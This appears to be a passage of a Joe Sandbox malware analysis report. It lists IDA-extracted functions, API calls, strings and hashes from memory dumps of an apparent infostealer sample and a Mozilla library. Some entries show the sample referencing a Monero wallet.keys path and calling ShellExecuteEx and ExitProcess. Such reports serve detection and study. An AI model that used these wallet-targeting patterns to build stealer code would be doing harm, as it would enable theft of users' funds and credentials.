Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: ce0d6b5070d816cc6e80a1f032b05b30dab1e1924fd1c49e1c553e31739db2b7
Instruction ID: ca28b8b1675c212be558220117f7de1aca2cebee3c3b2696999ce9e4e8322277
Opcode Fuzzy Hash: ce0d6b5070d816cc6e80a1f032b05b30dab1e1924fd1c49e1c553e31739db2b7
Instruction Fuzzy Hash: B8210771A002059BEB108F69CC80BAABBB9FF86314F284529E918DB341E736D911C7B5

Function 00198D00 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(013ADC28,?,?,?,00190F1C,?,013ADC28,00000000), ref: 00198D0C
lstrcpyn.KERNEL32(003AD378,013ADC28,013ADC28,?,00190F1C,?,013ADC28), ref: 00198D30
lstrlen.KERNEL32(?,?,00190F1C,?,013ADC28), ref: 00198D47
wsprintfA.USER32 ref: 00198D67

Strings

%s%s, xrefs: 00198D55

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 64b7c34789eb02829982939b627d18054a0b55712914d1cfaf68e6905c0f0be6
Instruction ID: c9ba16e13058d614b4644b05ffbcdc1094794366c76d48bc1363602f4f4163c2
Opcode Fuzzy Hash: 64b7c34789eb02829982939b627d18054a0b55712914d1cfaf68e6905c0f0be6
Instruction Fuzzy Hash: 0901E1B9500208FFCB05DFA8D954DAE7BB9EF4A345F108148F90A9B344CB71AA50DB91

Function 6C6B0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C673DEF), ref: 6C6B0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C673DEF), ref: 6C6B0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C673DEF), ref: 6C6B0DAF

Strings

<jemalloc>, xrefs: 6C6B0D92, 6C6B0DB9
: (malloc) Error in VirtualFree(), xrefs: 6C6B0D97, 6C6B0DBE

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 18ef300a787ac60527e94d57bd96e10736540c78704e2b211e0c14a6645224c0
Instruction ID: 16a7935057ed6efd78885f4954fde02d1b71d82d60877ecd59ec1b67465b3192
Opcode Fuzzy Hash: 18ef300a787ac60527e94d57bd96e10736540c78704e2b211e0c14a6645224c0
Instruction Fuzzy Hash: 38F080B138139823E61015665F06B962E9F67C2B55F344035F225FADC0DA70E411876D

Function 6C69D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

EnterCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D4F2
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D50B

Part of subcall function 6C67CFE0: EnterCriticalSection.KERNEL32(6C6FE784), ref: 6C67CFF6
Part of subcall function 6C67CFE0: LeaveCriticalSection.KERNEL32(6C6FE784), ref: 6C67D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D52E
EnterCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D690
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D751

Strings

MOZ_CRASH(), xrefs: 6C69D4BB

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: c9aede8dd9eda3211db7316de22d9e9311b2ee067b46ee3700ff65acc3d77de1
Instruction ID: d93ad2189e70c190fd9f8374d2d6f141bb0ba1a1ec863a5c1d42d8edd0aecb4d
Opcode Fuzzy Hash: c9aede8dd9eda3211db7316de22d9e9311b2ee067b46ee3700ff65acc3d77de1
Instruction Fuzzy Hash: 2051E371A047068FD714CF29C0D065ABBF2EB8A704F14493ED5AAC7B84D771E801CB5A

Function 6C6CB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C674290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C6B3EBD,6C6B3EBD,00000000), ref: 6C6742A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6CB127), ref: 6C6CB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6CB4E4

Strings

pid:, xrefs: 6C6CB4DE

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 38bb152147dd68db6649754623ece22ac30c8b39985866d1befb1dad53ee70b1
Instruction ID: a9d4d016f9d7fcbd9bfc97b9a82707e7e0e73c05ca050ef4f63845b5527cf403
Opcode Fuzzy Hash: 38bb152147dd68db6649754623ece22ac30c8b39985866d1befb1dad53ee70b1
Instruction Fuzzy Hash: ED314631B05208DFDB10DFA9D880AEEB7B6FF85318F540529D81167A40D736E849CBEA

Function 001960D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00196103

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

ShellExecuteEx.SHELL32(0000003C), ref: 001961C6
ExitProcess.KERNEL32 ref: 001961F5

Strings

<, xrefs: 00196179

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 791adb879d519f5a1c53862c9019114d697aab0ccf6120195288d91ceaacfd36
Instruction ID: e054be4e912089ed3fbe17cdbd63fc80a71e98829854b03a051e64cfc09a35bb
Opcode Fuzzy Hash: 791adb879d519f5a1c53862c9019114d697aab0ccf6120195288d91ceaacfd36
Instruction Fuzzy Hash: 2D313CB1811118ABDF15EB90DC96BDEB77CAF64300F804199F20967191DF706B48CF95

Function 00198260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DF8,00000000,?), ref: 001982CF
RtlAllocateHeap.NTDLL(00000000), ref: 001982D6
wsprintfA.USER32 ref: 001982F0

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Strings

%dx%d, xrefs: 001982E7

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: bdf8257d7a3777b8cbd14eac1a3a1b930e8fc6b424d6c6769ed6a30f3ef32f3e
Instruction ID: 4630994e7d1ebaa5cdd7c54706073942abf9dbb4f1318df55e77b6eda08eb51c
Opcode Fuzzy Hash: bdf8257d7a3777b8cbd14eac1a3a1b930e8fc6b424d6c6769ed6a30f3ef32f3e
Instruction Fuzzy Hash: 982142B1E40204AFDB05DF94DC45FAEBBBCFB49711F104219F605A7680C775A901CBA1

Function 6C6BE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6BE577
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BE584
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6BE8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6BE826, 6C6BE850
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C6BE722, 6C6BE750, 6C6BE7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C6BE777
MOZ_PROFILER_STARTUP, xrefs: 6C6BE5A1, 6C6BE5CC, 6C6BE5FF, 6C6BE62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C6BE655

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: d6dbcc130141c7d376fb0ae0d48b5b96379e70b2bd4610d86a80969e8373bba6
Instruction ID: 42704a496c8ea43da358345b296f30f332c531bdcbb8709589e90615ed27120d
Opcode Fuzzy Hash: d6dbcc130141c7d376fb0ae0d48b5b96379e70b2bd4610d86a80969e8373bba6
Instruction Fuzzy Hash: 4F118E31604258DFCB009F16D488A6DBBF6FFC9368F010619E9A557B51D770A806CBDE

Function 001987F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00198FBE,00000000), ref: 001987FB
RtlAllocateHeap.NTDLL(00000000), ref: 00198802
wsprintfW.USER32 ref: 00198818

Strings

%hs, xrefs: 0019880F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 0699ec1935619053642bd417f23accf2a1bba3c905fa29170fa0533e382828ac
Instruction ID: 36bb1f8ff526d92f98bf8e6077686ae40a7052a6486829858c665cebc75b5a6a
Opcode Fuzzy Hash: 0699ec1935619053642bd417f23accf2a1bba3c905fa29170fa0533e382828ac
Instruction Fuzzy Hash: 2FE0ECB5A44208BFD711DB94DC0AE6977ACEB0A701F000154FE0A97680DA719E109B95

Function 6C6C0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C0CD5

Part of subcall function 6C6AF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6AF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C0D40
free.MOZGLUE ref: 6C6C0DCB

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

free.MOZGLUE ref: 6C6C0DDD
free.MOZGLUE ref: 6C6C0DF2

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 3e8ef359588e455776f22b8bf18f03a709bc24580ad7f9581dd4078ef239ad1f
Instruction ID: db3c9609cf6f976d40109ee3fa011ee490782173101638c9b4ea98c14056416a
Opcode Fuzzy Hash: 3e8ef359588e455776f22b8bf18f03a709bc24580ad7f9581dd4078ef239ad1f
Instruction Fuzzy Hash: E641F8B1A097849BD720CF29C04079AFBE5FF89714F108A1EE8D887750D770A445CB8B

Function 6C6CCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCDA4

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

Part of subcall function 6C6CD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6CCDBA,00100000,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD158
Part of subcall function 6C6CD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6CCDBA,00100000,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCDC4

Part of subcall function 6C6C7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6D15FC,?,?,?,?,6C6D15FC,?), ref: 6C6C74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CCECC

Part of subcall function 6C68CA10: mozalloc_abort.MOZGLUE(?), ref: 6C68CAA2

Part of subcall function 6C6BCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6CCEEA,?,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000), ref: 6C6BCB57
Part of subcall function 6C6BCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C6BCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6CCEEA,?,?), ref: 6C6BCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C6BDA31,00100000,?,?,00000000,?), ref: 6C6CD058

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: db99decde1bcb8c9dfb1f950e2e03afb2f5333ea3e7e33e6f7efcb1957ffb5db
Instruction ID: a4a1ce886107fc406c61f186249fffc2e02a9a3df3d2090e7bf87fc5b1f586dd
Opcode Fuzzy Hash: db99decde1bcb8c9dfb1f950e2e03afb2f5333ea3e7e33e6f7efcb1957ffb5db
Instruction Fuzzy Hash: 31D16E71B04B069FD708CF28C480B99B7E1FF89308F01866DD95987752EB31E9A5CB86

Function 0018D240 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

